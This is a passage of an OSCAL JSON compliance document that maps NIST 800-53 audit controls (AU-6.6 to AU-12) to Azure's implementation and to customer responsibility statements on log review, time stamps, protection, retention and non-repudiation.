customer-deployed resources.","provided-uuid":"f2dbabce-7d26-4736-9a65-f96a53cedd52"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"43891404-71ec-4c36-96e1-f6c5e3975d4b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.6","statements":[{"uuid":"627f843b-8825-4a99-968a-03c726814a35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-025"},{"name":"control-origination","value":"system-specific"}],"statement-id":"au-6.6_smt","by-components":[{"uuid":"8105d58b-b84f-42e4-8c0e-eefe80b718b3","export":{"provided":[{"uuid":"ec1ac6d9-0903-48d2-8909-35dc4ac653e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-025"}],"description":"The Azure Security Response Team combine the analysis of audit records with physical security monitoring data as needed to aid in incident investigations. Any breaches or physical security incidents are reported through the incident reporting process by the physical security team if the physical security incident could potentially impact logical security. The Security Response Team then compares information from such physical security incidents to audit logging records to further identify and investigate suspicious behavior. Furthermore, when a physical incident is reported, the Security Response Team uses the related physical monitoring data and correlates it with audit records to determine if there was any associated logical breach or suspicious behavior in the Azure environment._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"79d1eec6-4e54-4ae3-b4cd-25e2279fecf5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.7","statements":[{"uuid":"0440924c-68f9-4072-a8ef-d2300f2017d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6.7_smt","by-components":[{"uuid":"0de14f0b-5954-4417-9556-209f2ff9aa50","export":{"provided":[{"uuid":"3248059c-f0db-43ba-8b4f-6138478a5fa3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-026"}],"description":"Azure specifies the permitted actions for each process, role, or user via role-based access control. Security groups are defined in OneIdentityand MyAccess; each security group has specified access rights and permitted actions. Users are added to security groups via the account management process managed and implemented by Azure service teams._x000D_ _x000D_ The Azure Security Response Team, responsible for both incident management and monitoring, define the roles and responsibilities in the Incident Management SOP. Additionally, the Security Response Team performs both incident management and monitors analytics from the logging systems. Only authorized members of the Security Response Team have access to audit log information. This information is only used to aid in incident management and investigation and is not available to personnel outside the incident management function._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5566fd92-8bf8-4c3c-a0fc-754910fa7955","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-026"}],"description":"The customer is responsible for specifying the permitted actions associated with the review, analysis, and reporting of customer-controlled audit information.","provided-uuid":"3248059c-f0db-43ba-8b4f-6138478a5fa3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a06497d9-0d2c-45b2-8151-78a6937077e2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-7","statements":[{"uuid":"342840bb-038e-4887-b048-e6723b820c51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-7_smt.a","by-components":[{"uuid":"bded7a5b-036c-4409-b6c2-21f26763d08d","export":{"provided":[{"uuid":"a5ab1f0b-e2f8-4e85-9ef5-6676a499223a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-027"}],"description":"Azure service teams leverage Geneva Monitoring and SCUBA as part of environment-wide monitoring solutions. Geneva Monitoring and SCUBA digest large amounts of log data into human-readable alerting and reports. All events are logged and available for human review as needed, but all events are reviewed automatically and known good activity is filtered out from alerting on an ongoing basis. Events that meet detection criteria, such as those that could indicate attacks or misuse, are automatically flagged and escalated as alerts in S360 or work items in IcM or DevOps. These are sent directly to Azure service teams for clarification and feedback or escalated within the Security Response Team for incident management."}],"responsibilities":[{"uuid":"77cc8bf1-2a77-4570-9019-3a529d62f046","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-027"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for providing and implementing an audit reduction and report generation capability for customer-deployed resources, including the support of on-demand audit review, analysis, and reporting requirements, and after-the-fact investigations of security incidents.","provided-uuid":"a5ab1f0b-e2f8-4e85-9ef5-6676a499223a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fe195662-7851-448e-8ff4-ef05ee83644b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-7_smt.b","by-components":[{"uuid":"3f7c0772-cfe0-46ab-ac67-42d886b7cdda","export":{"provided":[{"uuid":"f7e52f89-8f84-4ca3-8972-c185111e80a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-028"}],"description":"The tools used in Azure to collect and process audit records do not permanently or irreversibly alter the original audit record content or time ordering. Kusto and Jarvis by default are not an updateable data storage system, processing logs as read-only. They do not provide any update or delete functionality."}],"responsibilities":[{"uuid":"45bdd777-5b67-4cc0-a702-b992ccc4f12c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-028"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for ensuring the original content and time ordering of customer-controlled audit records are not altered.","provided-uuid":"f7e52f89-8f84-4ca3-8972-c185111e80a3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"546a4309-0e8b-41b6-9d01-02e20ae7dd8b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-7.1","statements":[{"uuid":"76fd64e5-64da-49c8-a306-dca9af13302c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-7.1_smt","by-components":[{"uuid":"03b7a2e0-a52b-42c6-9450-198d024b633f","export":{"provided":[{"uuid":"f47de645-5af3-4cbe-b2cc-3293acd9c144","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-029"}],"description":"The incoming stream of events are aggregated, correlated, duplicated via standard Azure Storage processes, and reduced into security- or service-relevant alerts that are used by the service and Security Response Team to analyze and respond appropriately to suspicious activity. Authorized personnel are able to query Geneva Monitoring and generate reports that are used to review events or investigate specific activities._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5ec67c6b-4532-4c02-862a-bb01a2453a60","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-029"}],"description":"The customer is responsible for providing the capability to process customer-controlled audit records for events of interest.","provided-uuid":"f47de645-5af3-4cbe-b2cc-3293acd9c144"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5df7ff28-c484-4e04-bb1d-5fa6eb72adc8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-8","statements":[{"uuid":"6f12e54b-0c6c-41a5-a019-594a38b99032","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-8_smt.a","by-components":[{"uuid":"b946a330-15fd-40a0-9904-9da536b25323","export":{"provided":[{"uuid":"0ad8145a-05d5-40ad-852f-5ecfafaa14b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-030"}],"description":"For all Azure assets, audit records generated capture the time stamp from the internal system clock of the asset that generated the event. Azure implements time stamps stored in UTC format using NTP Version 3, which is based on the time standard from the United States Naval Observatory. NTP is a protocol designed to synchronize the clocks of computers over a network to a common time base._x000D_ _x000D_ Azure uses stratum 1 time sources in the United States for the infrastructure. Every pair of redundant core Azure datacenter routers (DCRs) provides clock information to the Azure datacenter devices. The overall approach is to use the DCRs as NTP servers. The DCRs synchronize off the authoritative stratum 1 time sources, with Azure equipment synchronizing off the DCRs._x000D_ _x000D_ The Azure NTP stratum 1 time servers sync off of the Global Positioning System (GPS) satellites. The same IP addresses for NTP are configured on the DCRs in each Azure datacenter, with routing tables being used to determine the closest source to any given client via an anycast-style solution. These IP addresses are in management IP space and synchronization is done over the management network, which addresses ACL issues._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8673639c-26db-48d2-b1b5-92b0a1c3c480","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-030"}],"description":"The customer is responsible for generating time stamps for audit records of customer-deployed resources using the internal system clock.","provided-uuid":"0ad8145a-05d5-40ad-852f-5ecfafaa14b1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a403baac-f9b2-4ff7-88b1-5b9b782f7bdb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-8_smt.b","by-components":[{"uuid":"3dd88366-763c-4a40-a48a-dd059ada418d","export":{"provided":[{"uuid":"3c0a24cb-bdf9-420b-ad97-e475183549f6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-031"}],"description":"Azure records time stamps for audit records that can be mapped to Coordinated Universal Time (UTC). Time stamps are generated either in UTC directly or in local time with an offset from UTC. Azure time stamps are precise at least to the millisecond._x000D_ _x000D_"}],"responsibilities":[{"uuid":"1f3a5fd2-95db-4cfe-93ee-d2f3a2fbe512","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-031"}],"description":"The customer is responsible for ensuring customer-controlled audit records have time stamps that are recorded and can be mapped to Coordinated Universal Time (UTC) or Greenwich Mean Time (GMT).","provided-uuid":"3c0a24cb-bdf9-420b-ad97-e475183549f6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"28361f22-6d66-48e3-a6a3-b6116e1d0fff","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-9","statements":[{"uuid":"00f7d889-0519-4127-95b3-a1a2146551bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-9_smt.a","by-components":[{"uuid":"8af81030-8461-435e-aa41-c019a7c19ea7","export":{"provided":[{"uuid":"4bfa880b-0f2d-4532-93b2-c50a313d6354","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-032"}],"description":"Only service team personnel for the specific asset within Azure have access to security logs on the local asset via the role-based access control (RBAC) implemented via OneIdentity. Azure implements protection of audit information using an authenticated and encrypted connection from the local asset of log generation to the centralized audit collection services using the Geneva Monitoring Agent (MA). Access to the centralized audit collection services and storage is restricted to the Security Engineering and Operations groups based on the standard access groups defined for Azure. Only authorized service team personnel are allowed access to the actual audit records, and their assigned rights prohibit them from modifying or deleting audit information. Even if a user is able to clear local asset log data after elevating permissions via an approved JIT request, the action of cleaning the data is logged, and the cleared log data is present on Geneva Monitoring storage due to central ingestion. The following mechanisms are used to protect log information in transit and at rest: * Logs on the local asset can only be accessed through direct login to the asset. * The transfer of logs from the local asset to the service team and central storage accounts occurs over an HTTPS connection. * Read-only access to logs in Geneva Monitoring storage for Azure users is enabled through the Geneva Monitoring front-end portal. The access is restricted through AD security groups which are managed through OneIdentity."}],"responsibilities":[{"uuid":"2fa8cb0e-2d3a-40f4-a6bf-7e93f7a9c3d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-032"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for preventing unauthorized access to audit information and audit logging tools.","provided-uuid":"4bfa880b-0f2d-4532-93b2-c50a313d6354"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"96dad950-43c3-4d7c-a059-3f4a4d82443c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-9_smt.b","by-components":[{"uuid":"5bd5dd06-b7b0-4a22-81b3-2389c84b59bd","export":{"provided":[{"uuid":"e507e236-2940-46b6-9be2-24a8ce543455","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-033"}],"description":"Azure configures the detections and resulting alerts to be sent to the appropriate parties for resolution. Depending on the alert, this can include the service team or the Security Response Team. For example, use of Break-Glass account generates an alert to the service team owning the subscription in which Break-Glass account access was utilized. Alternatively, malicious PowerShell scripts are routed to the Security Response Team. Regardless of which team the alert is routed to, all service teams, Azure personnel, and external customers can escalate an incident or report a new one.O143"}],"responsibilities":[{"uuid":"bc17a375-7a4f-4b75-bfdd-eec2280b3921","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-033"}],"description":"For customers of IaaS and PaaS services, the customer is responsible alerting organization-defined personnel or roles upon detection of unauthorized access, modification, or deletion of audit information.","provided-uuid":"e507e236-2940-46b6-9be2-24a8ce543455"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"adea8b0b-03c4-4c05-a590-79625dc51421","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-9.2","statements":[{"uuid":"79def84d-0b91-4349-a1df-b71c06c51c25","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-9.2_smt","by-components":[{"uuid":"f4dee4fc-2c08-4ff6-8e58-2bcc2c41cd36","export":{"provided":[{"uuid":"ce184938-402e-48c3-bcb0-b0faf1c0b4de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-034"}],"description":"Audit backs up logs to the service team Azure Storage accounts in near-real time. If this near-real-time log shipping fails, logs are retained on the local asset until they can be exported to the appropriate central storage location._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e28126c8-f44c-407f-a90e-96e258a5daf5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-034"}],"description":"The customer is responsible for backing up customer-controlled audit records to a physically different system at the required frequency.","provided-uuid":"ce184938-402e-48c3-bcb0-b0faf1c0b4de"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"08a7177c-3333-45ed-852a-5a6edf1db2b7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-9.3","statements":[{"uuid":"9247669a-9e3b-4120-b18c-fe44f26d0e12","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-9.3_smt","by-components":[{"uuid":"fd8b43e4-931e-45e5-b1a5-9cf79f55452e","export":{"provided":[{"uuid":"1b74070c-2742-4176-8860-a689a3161924","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-035"}],"description":"Azure cryptographically protects all audit log data stored within the Azure Storage accounts used for audit log retention as a native feature of Azure Storage. In addition, Kusto and Jarvis storage is read-only by design, and once logs are ingested and stored, cannot be altered or deleted in any way._x000D_ _x000D_ Audit tooling is protected in the same method as all other Azure code, via the code signing process as part of the Security Development Lifecycle (SDL) implementation and System Lockdown validation, currently operating in Audit Mode. System Lockdown alerts the affected Azure service team when unsigned code is installed and run within Azure. When Enforcement Mode is activated, System Lockdown will block unsigned code._x000D_ _x000D_"}],"responsibilities":[{"uuid":"06cedf4c-aec0-44da-b041-1098ee7cfcc9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-035"}],"description":"The customer is responsible for maintaining the integrity of the customer-controlled audit system.","provided-uuid":"1b74070c-2742-4176-8860-a689a3161924"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f1c7dfd9-f25f-4461-bb5e-9eb16277c680","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-9.4","statements":[{"uuid":"f48c8c99-9857-4893-9301-3f012d1d7863","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-9.4_smt","by-components":[{"uuid":"6e1a4c95-5016-4fa2-9d2c-d06e3e1176d3","export":{"provided":[{"uuid":"4b803247-e1eb-4c20-91c4-d7083697596d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-036"}],"description":"Azure restricts management of audit functionality within Azure to the service teams and Azure Security team with approved least privilege and separation of duties role-based access. If the audit logs contain customer information, the logs are further restricted to a defined access group managed by the service team and restricted to need-to-know personnel. These personnel do not have the ability to modify or delete audit records from the central log repositories, and if they disable logging, that action itself is logged and investigated._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fe1a444d-8870-4794-b9e8-2ffa9b5c9607","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-036"}],"description":"The customer is responsible for restricting the management of customer-controlled audit resources to authorized users.","provided-uuid":"4b803247-e1eb-4c20-91c4-d7083697596d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1e309b6d-7e8e-4837-8cd2-5878ded3441e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-10","statements":[{"uuid":"69703b52-18d0-4220-b0bb-c29acf36be44","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-037"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-10_smt","by-components":[{"uuid":"feb39f8b-01c6-478d-8279-542b5c3b3fd6","export":{"provided":[{"uuid":"f1281563-430c-4977-b2f7-f7516ab0ec7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-037"}],"description":"As part of the content of audit records captured within Azure, unique identifiers are captured by servers, network devices, and services. Azure requires unique identifiers assigned based on individual's unique account for Active Directory federation with domain and Authentication, Authorization, and Accounting (AAA) credentials. The combination of event logs capturing identifiers, and identifiers uniquely identified based on individual's Azure accounts, constitute non-repudiation for the Azure environment._x000D_ _x000D_ For both Windows and Linux assets, the security logs are protected from non-repudiation and tampering using the following configurations, with the implementation being platform specific:_x000D_ _x000D_ * On the asset, Geneva Monitoring Agent (MA) authenticates from the asset to the central service for uploading security logs. The security logs use the Geneva Control-Plane Service (GCS) to manage the authentication from the agent on the asset to the Geneva Monitoring service. GCS uses an Azure Storage Shared Access Signatures (SAS) key implementation so that the full key is not exposed to the users on the asset._x000D_ * The Azure service IFx audit logs and key system application security events such as antimalware, PowerShell command line, and Terminal Services Remote Desktop Protocol access are uploaded every ten (10) minutes off the asset. The Linux system security event logs via AuditD and key system application security events such as antimalware are uploaded every one (1) minute off the asset. The MA watermarks the system security and IFx audit events to confirm that events are uploaded. The configuration has retry values in case the central store is offline so that the MA continues to retry uploads of the events when connectivity is re-established._x000D_ * Once the logs are uploaded to the Geneva Monitoring storage accounts for each service, the logs are submitted to downstream detection systems within approximately fifteen (15) minutes to analyze specified security events for unusual activity. Analysis timelines vary depending on the type of detection. Additionally, the security logs are moved to cold storage every five (5) minutes as part of Geneva Monitoring._x000D_ * Malicious activity on the asset that attempts to affect security log collection is monitored and alerted for, including monitoring for clearing of the security event log and audit policy changes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c0b29032-cfb5-4bfb-8508-3837b8a907df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-037"}],"description":"The customer is responsible for enforcing non-repudiation for customer-deployed resources.","provided-uuid":"f1281563-430c-4977-b2f7-f7516ab0ec7b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"97cc67ec-c54c-4eeb-bb80-65d795527857","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-11","statements":[{"uuid":"f7b496ac-e1df-4238-873f-2fae6cf0a40c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-11_smt","by-components":[{"uuid":"90058f62-4560-403a-a507-96955b4a1b11","export":{"provided":[{"uuid":"4c6b2882-bf19-4e6f-bf7c-132f4bce8ee3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-038"}],"description":"Azure retains collected logs in storage for at least ninety (90) days to support investigations of security incidents and to meet regulatory retention requirements. Azure stores audit logs offline for at least one (1) year within Kusto storage._x000D_ _x000D_ C+AI Security has developed an archiving infrastructure to securely store audit records on servers dedicated to archival purposes. The servers are designed to verify the integrity of archived files and allows authorized user to browse to an archive location. Audit records are stored in centralized log servers that are protected against alteration._x000D_ _x000D_"}],"responsibilities":[{"uuid":"6c9dd693-7ff3-4a60-8295-d7a163b0a4f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-038"}],"description":"The customer is responsible for retaining audit records for customer-deployed resources to support security investigations and meet regulatory requirements. Audit records must be retained for the defined frequency.","provided-uuid":"4c6b2882-bf19-4e6f-bf7c-132f4bce8ee3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7c2cddc1-7094-4494-ace4-639506d6e8d8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-12","statements":[{"uuid":"e45b5bfc-f7e5-4af3-a226-a2302b41447b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-12_smt.a","by-components":[{"uuid":"02e648bf-4385-4599-ad91-bfa7e0fd06b7","export":{"provided":[{"uuid":"10dc4403-8e00-457c-8407-ce25180e72e6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-039"}],"description":"Azure implements audit generation by configuring all servers, network devices, and services to have the capability to generate audit records and audit record metadata as required. Azure sets standard configuration baselines for all servers and network devices, ensuring the consistent generation of the required audit logs. Service teams ensure the required audit logs are captured at the service layer through the Azure Security Development Lifecycle (SDL) process. Azure also utilizes Azure Security Pack (AzSecPack) and Geneva Monitoring to ensure the central ingestion of those logs._x000D_ _x000D_"}],"responsibilities":[{"uuid":"305c91a3-16f3-4bc8-a9fc-e690379f9d77","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-039"}],"description":"The customer is responsible for ensuring all customer-deployed resources have the ability to generate records for the auditable events defined in AU-02.a.","provided-uuid":"10dc4403-8e00-457c-8407-ce25180e72e6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0d9bc204-fbbc-4b56-a127-3bfdd067d19e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-12_smt.b","by-components":[{"uuid":"55cf6e11-d96a-4b45-aa17-8252ad8e0854","export":{"provided":[{"uuid":"f0d5952e-264a-41ac-8258-3e596e4909b4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-040"}],"description":"Azure implements audit generation by configuring all system network devices and servers to have the capability to generate audit records and audit record metadata as required. Service teams configure audit generation for the service layer to generate audit records and audit record metadata as required._x000D_ _x000D_"}],"responsibilities":[{"uuid":"defbf4ef-c42c-4306-ad20-401a35da987d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-040"}],"description":"The customer is responsible for assigning personnel to select audit events for 